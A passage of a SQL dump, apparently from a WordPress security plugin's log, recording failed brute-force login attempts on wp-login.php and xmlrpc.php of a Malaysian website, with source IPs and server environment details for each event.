empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"206.189.151.204\";s:11:\"REMOTE_PORT\";s:5:\"37238\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHc@llvzIDnRn6zOHXTRAAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568791802.8605\";s:12:\"REQUEST_TIME\";s:10:\"1568791802\";}}','notice','2019-09-18 07:30:05','2019-09-18 07:30:03',18255296,19552840,'https://bintara.com.my/xmlrpc.php',1,0,'206.189.151.204'),(24962,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.100.13\";s:11:\"REMOTE_PORT\";s:5:\"46548\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHekllvzIDnRn6zOHXURQAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568792210.4903\";s:12:\"REQUEST_TIME\";s:10:\"1568792210\";}}','notice','2019-09-18 07:36:52','2019-09-18 07:36:50',17740488,19231656,'https://bintara.com.my/wp-login.php',1,0,'164.132.100.13'),(24963,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.100.13\";s:11:\"REMOTE_PORT\";s:5:\"47028\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHelUQGijxhVPhG1M0cRAAAAAA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568792213.7333\";s:12:\"REQUEST_TIME\";s:10:\"1568792213\";}}','notice','2019-09-18 07:36:55','2019-09-18 07:36:54',18257336,19557368,'https://bintara.com.my/xmlrpc.php',1,0,'164.132.100.13'),(24964,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"42276\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHe8yR0vdvYEIduPCLhoQAAAQg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568792307.5923\";s:12:\"REQUEST_TIME\";s:10:\"1568792307\";}}','notice','2019-09-18 07:38:29','2019-09-18 07:38:28',17739288,19232384,'https://bintara.com.my/wp-login.php',1,0,'128.199.133.250'),(24965,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"42676\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHe9kQGijxhVPhG1M0cWgAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568792310.4434\";s:12:\"REQUEST_TIME\";s:10:\"1568792310\";}}','notice','2019-09-18 07:38:32','2019-09-18 07:38:31',18258400,19557848,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.133.250'),(24966,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"176.9.74.214\";s:11:\"REMOTE_PORT\";s:5:\"53192\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHgNVlvzIDnRn6zOHXVdQAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568792629.1455\";s:12:\"REQUEST_TIME\";s:10:\"1568792629\";}}','notice','2019-09-18 07:43:50','2019-09-18 07:43:49',17740088,19230432,'https://bintara.com.my/wp-login.php',1,0,'176.9.74.214'),(24967,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"176.9.74.214\";s:11:\"REMOTE_PORT\";s:5:\"53683\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHgOFlvzIDnRn6zOHXVdwAAAJA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568792632.7284\";s:12:\"REQUEST_TIME\";s:10:\"1568792632\";}}','notice','2019-09-18 07:43:54','2019-09-18 07:43:53',18254592,19554888,'https://bintara.com.my/xmlrpc.php',1,0,'176.9.74.214'),(24968,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"52892\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHh424SfF9g@8lNlxw5KQAAAE4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568793059.9117\";s:12:\"REQUEST_TIME\";s:10:\"1568793059\";}}','notice','2019-09-18 07:51:01','2019-09-18 07:51:00',17741664,19232496,'https://bintara.com.my/wp-login.php',1,0,'50.63.167.184'),(24969,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.132.124.6\";s:11:\"REMOTE_PORT\";s:5:\"33154\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHh51lvzIDnRn6zOHXXGwAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568793063.8616\";s:12:\"REQUEST_TIME\";s:10:\"1568793063\";}}','notice','2019-09-18 07:51:06','2019-09-18 07:51:04',17742864,19233296,'https://bintara.com.my/wp-login.php',1,0,'185.132.124.6'),(24970,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 